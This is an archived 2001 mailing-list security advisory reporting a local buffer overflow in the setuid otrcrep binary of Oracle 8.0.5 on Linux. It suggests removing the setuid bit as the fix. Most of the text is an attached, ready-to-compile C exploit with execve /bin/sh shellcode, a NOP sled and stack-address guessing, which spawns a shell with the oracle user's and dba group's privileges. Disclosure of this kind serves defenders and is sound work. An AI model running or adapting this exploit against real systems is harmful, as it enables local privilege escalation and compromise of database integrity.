Date: Thu, 02 Aug 2001 09:33:34 +0200
From: Juan Manuel Pascual Escriba <[email protected]>
To: [email protected]Subject: vulnerability in otrcrep binary in Oracle 8.0.5.
Cc: [email protected]
--------------5F3C0A3A53255B5691432888
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
WWW.PLAZASITE.COM
System & Security Division
Title: Vulnerability in otrcrep in Oracle 8.0.5
Date: 14-12-2000
Platform: Only tested in Linux, but can be exported to others.
Impact: Any user gain euid=oracle and egid=dba.
Author: Juan Manuel Pascual ([email protected])
Status: Vendor contacted at 18th July 2001
PROBLEM SUMMARY:
There is a buffer overflow in otrcrep binary that can be use by
local users to obtain euid of oracle user and egid to dba group.
IMPACT:
Any user with local access, can gain euid= oracle and compromise the
integrity of DataBase.
SOLUTION:
Chmod -s.
STATUS:
Vendor was contacted .
----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba [email protected]
--------------5F3C0A3A53255B5691432888
Content-Type: text/plain; charset=us-ascii;
name="otrcrep-8.0.5.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="otrcrep-8.0.5.c"
/* cc -o evolut otrcrep.c; ./evolut 300 0 */
#include <stdio.h>
#include <stdlib.h>
#define BUFFER 300
#define OFFSET 0
#define NOP 0x90
#define BINARY "/home/oracle/app/oracle/product/8.0.5/bin/otrcrep a $EGG"
#define ORACLE_HOME "/home/oracle/app/oracle/product/8.0.5"
char shellcode[] =
"\xeb\x1d"
"\x5e"
"\x29\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\x89\x76\x08"
"\xb0\x0b"
"\x87\xf3"
"\x8d\x4b\x08"
"\x8d\x53\x0c"
"\xcd\x80"
"\x29\xc0"
"\x40"
"\xcd\x80"
"\xe8\xde\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
/* void main(int argc, char *argv[]) { */
void main() {
char *buff, *ptr,binary[120];
long *addr_ptr, addr;
int bsize=BUFFER;
int i,offset=OFFSET;
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() -1420 -offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
memset(buff,bsize/2,NOP);
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
setenv("ORACLE_HOME",ORACLE_HOME,1);
setenv("EGG",buff,1);
system(BINARY);
}
--------------5F3C0A3A53255B5691432888--